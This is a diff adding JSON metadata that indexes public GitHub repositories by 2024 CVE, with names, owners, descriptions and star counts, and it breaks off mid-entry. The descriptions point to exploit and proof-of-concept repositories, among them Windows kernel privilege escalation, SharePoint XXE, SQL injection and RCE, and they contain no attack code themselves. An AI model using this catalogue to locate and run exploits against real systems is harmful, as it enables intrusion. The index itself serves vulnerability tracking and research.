0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29988.json b/2024/CVE-2024-29988.json new file mode 100644 index 0000000000..f3ecc622e2 --- /dev/null +++ b/2024/CVE-2024-29988.json @@ -0,0 +1,33 @@ +[ + { + "id": 795499188, + "name": "CVE-2024-29988-exploit", + "full_name": "Sploitus\/CVE-2024-29988-exploit", + "owner": { + "login": "Sploitus", + "id": 168830967, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168830967?v=4", + "html_url": "https:\/\/github.com\/Sploitus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sploitus\/CVE-2024-29988-exploit", + "description": "Exploit for Microsoft SmartScreen malicious execution (april 2024)", + "fork": false, + "created_at": "2024-05-03T12:17:25Z", + "updated_at": "2024-10-24T13:10:29Z", + "pushed_at": "2024-05-03T12:57:49Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30043.json b/2024/CVE-2024-30043.json new file mode 100644 index 0000000000..05a2793bec --- /dev/null +++ b/2024/CVE-2024-30043.json @@ -0,0 +1,33 @@ +[ + { + "id": 811511540, + "name": "CVE-2024-30043-XXE", + "full_name": "W01fh4cker\/CVE-2024-30043-XXE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-30043-XXE", + "description": "Exploiting XXE Vulnerabilities on Microsoft SharePoint Server and Cloud via Confused URL Parsing", + "fork": false, + "created_at": "2024-06-06T18:31:57Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-06-06T18:38:06Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30051.json b/2024/CVE-2024-30051.json new file mode 100644 index 0000000000..84504592c6 --- /dev/null +++ b/2024/CVE-2024-30051.json @@ -0,0 +1,33 @@ +[ + { + "id": 842575899, + "name": "CVE-2024-30051", + "full_name": "fortra\/CVE-2024-30051", + "owner": { + "login": "fortra", + "id": 117669217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117669217?v=4", + "html_url": "https:\/\/github.com\/fortra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fortra\/CVE-2024-30051", + "description": null, + "fork": false, + "created_at": "2024-08-14T16:20:38Z", + "updated_at": "2024-11-20T16:31:01Z", + "pushed_at": "2024-09-05T23:21:00Z", + "stargazers_count": 106, + "watchers_count": 106, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 106, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30052.json b/2024/CVE-2024-30052.json new file mode 100644 index 0000000000..270a1b80b8 --- /dev/null +++ b/2024/CVE-2024-30052.json @@ -0,0 +1,33 @@ +[ + { + "id": 867811373, + "name": "CVE-2024-30052", + "full_name": "ynwarcs\/CVE-2024-30052", + "owner": { + "login": "ynwarcs", + "id": 108408574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108408574?v=4", + "html_url": "https:\/\/github.com\/ynwarcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ynwarcs\/CVE-2024-30052", + "description": "Materials for CVE-2024-30052.", + "fork": false, + "created_at": "2024-10-04T19:09:45Z", + "updated_at": "2024-10-28T19:44:45Z", + "pushed_at": "2024-10-04T20:28:39Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30056.json b/2024/CVE-2024-30056.json new file mode 100644 index 0000000000..f356b17e8a --- /dev/null +++ b/2024/CVE-2024-30056.json @@ -0,0 +1,33 @@ +[ + { + "id": 806410467, + "name": "Microsoft-Edge-Information-Disclosure", + "full_name": "absholi7ly\/Microsoft-Edge-Information-Disclosure", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/Microsoft-Edge-Information-Disclosure", + "description": "CVE-2024-30056 Microsoft Edge (Chromium-based) Information Disclosure Vulnerability", + "fork": false, + "created_at": "2024-05-27T06:37:34Z", + "updated_at": "2024-07-03T13:32:39Z", + "pushed_at": "2024-05-27T06:47:27Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30088.json b/2024/CVE-2024-30088.json new file mode 100644 index 0000000000..7b1f903353 --- /dev/null +++ b/2024/CVE-2024-30088.json @@ -0,0 +1,188 @@ +[ + { + "id": 819353425, + "name": "CVE-2024-30088", + "full_name": "tykawaii98\/CVE-2024-30088", + "owner": { + "login": "tykawaii98", + "id": 45362197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45362197?v=4", + "html_url": "https:\/\/github.com\/tykawaii98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tykawaii98\/CVE-2024-30088", + "description": null, + "fork": false, + "created_at": "2024-06-24T10:37:26Z", + "updated_at": "2024-11-28T03:59:23Z", + "pushed_at": "2024-07-31T19:11:55Z", + "stargazers_count": 239, + "watchers_count": 239, + "has_discussions": false, + "forks_count": 53, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 53, + "watchers": 239, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 820782545, + "name": "CVE-2024-30088-", + "full_name": "NextGenPentesters\/CVE-2024-30088-", + "owner": { + "login": "NextGenPentesters", + "id": 169174200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169174200?v=4", + "html_url": "https:\/\/github.com\/NextGenPentesters", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NextGenPentesters\/CVE-2024-30088-", + "description": "🆘New Windows Kernel Priviledge Escalation Vulnerability", + "fork": false, + "created_at": "2024-06-27T07:05:46Z", + "updated_at": "2024-11-02T10:05:52Z", + "pushed_at": "2024-06-27T07:19:11Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824657284, + "name": "CVE-2024-30088-Windows-poc", + "full_name": "Zombie-Kaiser\/CVE-2024-30088-Windows-poc", + "owner": { + "login": "Zombie-Kaiser", + "id": 141570642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141570642?v=4", + "html_url": "https:\/\/github.com\/Zombie-Kaiser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zombie-Kaiser\/CVE-2024-30088-Windows-poc", + "description": "该漏洞存在于 NtQueryInformationToken 函数中,特别是在处理AuthzBasepCopyoutInternalSecurityAttributes 函数时,该漏洞源于内核在操作对象时对锁定机制的不当管理,这一失误可能导致恶意实体意外提升权限。", + "fork": false, + "created_at": "2024-07-05T16:02:56Z", + "updated_at": "2024-11-27T08:32:37Z", + "pushed_at": "2024-07-05T16:06:16Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 34, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828831210, + "name": "collateral-damage", + "full_name": "exploits-forsale\/collateral-damage", + "owner": { + "login": "exploits-forsale", + "id": 168065072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168065072?v=4", + "html_url": "https:\/\/github.com\/exploits-forsale", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploits-forsale\/collateral-damage", + "description": "Kernel exploit for Xbox SystemOS using CVE-2024-30088", + "fork": false, + "created_at": "2024-07-15T08:07:05Z", + "updated_at": "2024-11-28T03:05:52Z", + "pushed_at": "2024-09-08T21:23:34Z", + "stargazers_count": 418, + "watchers_count": 418, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 418, + "score": 0, + "subscribers_count": 18 + }, + { + "id": 834461917, + "name": "CVE-2024-30088", + "full_name": "Admin9961\/CVE-2024-30088", + "owner": { + "login": "Admin9961", + "id": 121270287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121270287?v=4", + "html_url": "https:\/\/github.com\/Admin9961", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Admin9961\/CVE-2024-30088", + "description": "Questa repository contiene una replica (tentativo di replica) scritto in Python per CVE-2024-30088.", + "fork": false, + "created_at": "2024-07-27T10:41:33Z", + "updated_at": "2024-08-20T19:17:32Z", + "pushed_at": "2024-07-27T16:30:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847302794, + "name": "exploits-forsale-collateral-damage", + "full_name": "Justintroup85\/exploits-forsale-collateral-damage", + "owner": { + "login": "Justintroup85", + "id": 179375703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179375703?v=4", + "html_url": "https:\/\/github.com\/Justintroup85", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Justintroup85\/exploits-forsale-collateral-damage", + "description": "Kernel exploit for Xbox SystemOS using CVE-2024-30088", + "fork": false, + "created_at": "2024-08-25T12:47:10Z", + "updated_at": "2024-08-25T17:03:51Z", + "pushed_at": "2024-08-25T16:48:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30090.json b/2024/CVE-2024-30090.json new file mode 100644 index 0000000000..1a7f4fe375 --- /dev/null +++ b/2024/CVE-2024-30090.json @@ -0,0 +1,33 @@ +[ + { + "id": 874092793, + "name": "CVE-2024-30090", + "full_name": "Dor00tkit\/CVE-2024-30090", + "owner": { + "login": "Dor00tkit", + "id": 47893732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47893732?v=4", + "html_url": "https:\/\/github.com\/Dor00tkit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dor00tkit\/CVE-2024-30090", + "description": "CVE-2024-30090 - LPE PoC", + "fork": false, + "created_at": "2024-10-17T08:38:47Z", + "updated_at": "2024-11-25T09:08:57Z", + "pushed_at": "2024-10-17T09:53:33Z", + "stargazers_count": 98, + "watchers_count": 98, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 98, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30212.json b/2024/CVE-2024-30212.json new file mode 100644 index 0000000000..9c2fed251b --- /dev/null +++ b/2024/CVE-2024-30212.json @@ -0,0 +1,33 @@ +[ + { + "id": 813535717, + "name": "blackleak", + "full_name": "Fehr-GmbH\/blackleak", + "owner": { + "login": "Fehr-GmbH", + "id": 94897660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94897660?v=4", + "html_url": "https:\/\/github.com\/Fehr-GmbH", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fehr-GmbH\/blackleak", + "description": "CVE-2024-30212", + "fork": false, + "created_at": "2024-06-11T09:13:16Z", + "updated_at": "2024-06-16T15:28:02Z", + "pushed_at": "2024-06-11T09:54:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30255.json b/2024/CVE-2024-30255.json new file mode 100644 index 0000000000..3eae4bf7db --- /dev/null +++ b/2024/CVE-2024-30255.json @@ -0,0 +1,33 @@ +[ + { + "id": 784316858, + "name": "Envoy-CPU-Exhaustion-Vulnerability-PoC", + "full_name": "blackmagic2023\/Envoy-CPU-Exhaustion-Vulnerability-PoC", + "owner": { + "login": "blackmagic2023", + "id": 149164084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149164084?v=4", + "html_url": "https:\/\/github.com\/blackmagic2023", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blackmagic2023\/Envoy-CPU-Exhaustion-Vulnerability-PoC", + "description": "CVE-2024-30255 This repository contains a proof-of-concept (PoC) Python script to demonstrate the CPU exhaustion vulnerability in Envoy caused by a flood of CONTINUATION frames.", + "fork": false, + "created_at": "2024-04-09T15:59:50Z", + "updated_at": "2024-04-17T06:01:02Z", + "pushed_at": "2024-04-09T16:04:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30270.json b/2024/CVE-2024-30270.json new file mode 100644 index 0000000000..4670d4ac52 --- /dev/null +++ b/2024/CVE-2024-30270.json @@ -0,0 +1,33 @@ +[ + { + "id": 818090111, + "name": "CVE-2024-30270-PoC", + "full_name": "Alchemist3dot14\/CVE-2024-30270-PoC", + "owner": { + "login": "Alchemist3dot14", + "id": 63059909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63059909?v=4", + "html_url": "https:\/\/github.com\/Alchemist3dot14", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alchemist3dot14\/CVE-2024-30270-PoC", + "description": "The script exploits Mailcow vulnerabilities via XSS and RCE, emphasizing the need for robust security measures and responsible usage to enhance web application security.", + "fork": false, + "created_at": "2024-06-21T04:47:48Z", + "updated_at": "2024-09-18T04:21:32Z", + "pushed_at": "2024-06-21T13:00:06Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30491.json b/2024/CVE-2024-30491.json new file mode 100644 index 0000000000..f26723d571 --- /dev/null +++ b/2024/CVE-2024-30491.json @@ -0,0 +1,33 @@ +[ + { + "id": 795962526, + "name": "CVE-2024-30491-Poc", + "full_name": "truonghuuphuc\/CVE-2024-30491-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-30491-Poc", + "description": "CVE-2024-30491 ProfileGrid <= 5.7.8 - Authenticated (Subscriber+) SQL Injection", + "fork": false, + "created_at": "2024-05-04T14:22:15Z", + "updated_at": "2024-06-26T12:03:51Z", + "pushed_at": "2024-05-04T18:36:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30614.json b/2024/CVE-2024-30614.json new file mode 100644 index 0000000000..518d3bc4eb --- /dev/null +++ b/2024/CVE-2024-30614.json @@ -0,0 +1,33 @@ +[ + { + "id": 782855972, + "name": "CVE-2024-30614", + "full_name": "Lucky-lm\/CVE-2024-30614", + "owner": { + "login": "Lucky-lm", + "id": 104305063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104305063?v=4", + "html_url": "https:\/\/github.com\/Lucky-lm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lucky-lm\/CVE-2024-30614", + "description": null, + "fork": false, + "created_at": "2024-04-06T08:26:04Z", + "updated_at": "2024-04-06T08:26:04Z", + "pushed_at": "2024-04-06T08:26:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30656.json b/2024/CVE-2024-30656.json new file mode 100644 index 0000000000..1652da16c8 --- /dev/null +++ b/2024/CVE-2024-30656.json @@ -0,0 +1,42 @@ +[ + { + "id": 783836651, + "name": "Firebolt-wristphone-vulnerability", + "full_name": "Yashodhanvivek\/Firebolt-wristphone-vulnerability", + "owner": { + "login": "Yashodhanvivek", + "id": 5335615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5335615?v=4", + "html_url": "https:\/\/github.com\/Yashodhanvivek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yashodhanvivek\/Firebolt-wristphone-vulnerability", + "description": "This repository is for Firebolt wristphone vulnerability for CVE ID CVE-2024-30656 suggested by MITRE. Mitre yet to confirm on ID", + "fork": false, + "created_at": "2024-04-08T17:05:39Z", + "updated_at": "2024-04-09T14:45:57Z", + "pushed_at": "2024-04-18T09:41:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "firebolt", + "vulnerability", + "wifi-deauth", + "wifi-deauther", + "wifi-hacking", + "wifi-security", + "wristphone" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30850.json b/2024/CVE-2024-30850.json new file mode 100644 index 0000000000..de01a8a438 --- /dev/null +++ b/2024/CVE-2024-30850.json @@ -0,0 +1,33 @@ +[ + { + "id": 782713509, + "name": "CVE-2024-30850-chaos-rat-rce-poc", + "full_name": "chebuya\/CVE-2024-30850-chaos-rat-rce-poc", + "owner": { + "login": "chebuya", + "id": 146861503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146861503?v=4", + "html_url": "https:\/\/github.com\/chebuya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chebuya\/CVE-2024-30850-chaos-rat-rce-poc", + "description": "CHAOS RAT web panel path RCE PoC", + "fork": false, + "created_at": "2024-04-05T21:35:04Z", + "updated_at": "2024-10-17T04:07:52Z", + "pushed_at": "2024-04-15T17:46:32Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 29, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30851.json b/2024/CVE-2024-30851.json new file mode 100644 index 0000000000..afdf3a867d --- /dev/null +++ b/2024/CVE-2024-30851.json @@ -0,0 +1,33 @@ +[ + { + "id": 782242240, + "name": "CVE-2024-30851-jasmin-ransomware-path-traversal-poc", + "full_name": "chebuya\/CVE-2024-30851-jasmin-ransomware-path-traversal-poc", + "owner": { + "login": "chebuya", + "id": 146861503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146861503?v=4", + "html_url": "https:\/\/github.com\/chebuya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chebuya\/CVE-2024-30851-jasmin-ransomware-path-traversal-poc", + "description": "Jasmin ransomware web panel path traversal PoC", + "fork": false, + "created_at": "2024-04-04T22:59:55Z", + "updated_at": "2024-07-08T20:23:49Z", + "pushed_at": "2024-04-09T03:40:52Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30875.json b/2024/CVE-2024-30875.json new file mode 100644 index 0000000000..50e526d9c5 --- /dev/null +++ b/2024/CVE-2024-30875.json @@ -0,0 +1,33 @@ +[ + { + "id": 851480447, + "name": "CVE-2024-30875", + "full_name": "Ant1sec-ops\/CVE-2024-30875", + "owner": { + "login": "Ant1sec-ops", + "id": 98224710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98224710?v=4", + "html_url": "https:\/\/github.com\/Ant1sec-ops", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ant1sec-ops\/CVE-2024-30875", + "description": "Reflected Cross Site Scripting - RXSS", + "fork": false, + "created_at": "2024-09-03T07:11:08Z", + "updated_at": "2024-09-04T13:09:20Z", + "pushed_at": "2024-09-04T13:09:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30896.json b/2024/CVE-2024-30896.json new file mode 100644 index 0000000000..9d4834f7a5 --- /dev/null +++ b/2024/CVE-2024-30896.json @@ -0,0 +1,33 @@ +[ + { + "id": 776087071, + "name": "CVE-2024-30896", + "full_name": "XenoM0rph97\/CVE-2024-30896", + "owner": { + "login": "XenoM0rph97", + "id": 44051481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44051481?v=4", + "html_url": "https:\/\/github.com\/XenoM0rph97", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XenoM0rph97\/CVE-2024-30896", + "description": null, + "fork": false, + "created_at": "2024-03-22T16:50:40Z", + "updated_at": "2024-11-27T16:49:55Z", + "pushed_at": "2024-11-20T23:58:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3094.json b/2024/CVE-2024-3094.json new file mode 100644 index 0000000000..5016ce4867 --- /dev/null +++ b/2024/CVE-2024-3094.json @@ -0,0 +1,1844 @@ +[ + { + "id": 779364261, + "name": "CVE-2024-3094-info", + "full_name": "byinarie\/CVE-2024-3094-info", + "owner": { + "login": "byinarie", + "id": 20119926, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20119926?v=4", + "html_url": "https:\/\/github.com\/byinarie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byinarie\/CVE-2024-3094-info", + "description": "Information for CVE-2024-3094", + "fork": false, + "created_at": "2024-03-29T17:03:01Z", + "updated_at": "2024-05-14T12:14:53Z", + "pushed_at": "2024-04-01T16:01:34Z", + "stargazers_count": 51, + "watchers_count": 51, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 51, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 779430633, + "name": "CVE-2024-3094-checker", + "full_name": "FabioBaroni\/CVE-2024-3094-checker", + "owner": { + "login": "FabioBaroni", + "id": 2703045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2703045?v=4", + "html_url": "https:\/\/github.com\/FabioBaroni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FabioBaroni\/CVE-2024-3094-checker", + "description": "Quick and dirty PoC for checking whether a vulnerable version of xz-utils is installed (CVE-2024-3094)", + "fork": false, + "created_at": "2024-03-29T20:28:17Z", + "updated_at": "2024-10-25T10:55:56Z", + "pushed_at": "2024-03-31T00:13:39Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 73, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 779437270, + "name": "CVE-2024-3094-Vulnerabity-Checker", + "full_name": "lypd0\/CVE-2024-3094-Vulnerabity-Checker", + "owner": { + "login": "lypd0", + "id": 146327014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146327014?v=4", + "html_url": "https:\/\/github.com\/lypd0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lypd0\/CVE-2024-3094-Vulnerabity-Checker", + "description": "Verify that your XZ Utils version is not vulnerable to CVE-2024-3094", + "fork": false, + "created_at": "2024-03-29T20:52:27Z", + "updated_at": "2024-05-03T02:31:49Z", + "pushed_at": "2024-03-29T21:56:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "check", + "checker", + "cve-2024-3094", + "exploit", + "scanner", + "script", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779449882, + "name": "xz_utils-CVE-2024-3094", + "full_name": "OpensourceICTSolutions\/xz_utils-CVE-2024-3094", + "owner": { + "login": "OpensourceICTSolutions", + "id": 68592870, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68592870?v=4", + "html_url": "https:\/\/github.com\/OpensourceICTSolutions", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpensourceICTSolutions\/xz_utils-CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-03-29T21:41:42Z", + "updated_at": "2024-03-29T21:41:42Z", + "pushed_at": "2024-03-29T21:42:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 779473804, + "name": "xz_cve-2024-3094_detection", + "full_name": "bioless\/xz_cve-2024-3094_detection", + "owner": { + "login": "bioless", + "id": 10271875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10271875?v=4", + "html_url": "https:\/\/github.com\/bioless", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bioless\/xz_cve-2024-3094_detection", + "description": "Script to detect CVE-2024-3094.", + "fork": false, + "created_at": "2024-03-29T23:20:22Z", + "updated_at": "2024-03-29T23:23:15Z", + "pushed_at": "2024-03-29T23:23:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779474128, + "name": "CVE-2024-3094_xz_check", + "full_name": "Hacker-Hermanos\/CVE-2024-3094_xz_check", + "owner": { + "login": "Hacker-Hermanos", + "id": 152432195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152432195?v=4", + "html_url": "https:\/\/github.com\/Hacker-Hermanos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hacker-Hermanos\/CVE-2024-3094_xz_check", + "description": "This repository contains a Bash script and a one-liner command to verify if a system is running a vulnerable version of the \"xz\" utility, as specified by CVE-2024-3094.", + "fork": false, + "created_at": "2024-03-29T23:21:44Z", + "updated_at": "2024-04-07T21:38:02Z", + "pushed_at": "2024-03-30T05:21:13Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 779476965, + "name": "CVE-2024-3094", + "full_name": "Fractal-Tess\/CVE-2024-3094", + "owner": { + "login": "Fractal-Tess", + "id": 75957529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75957529?v=4", + "html_url": "https:\/\/github.com\/Fractal-Tess", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fractal-Tess\/CVE-2024-3094", + 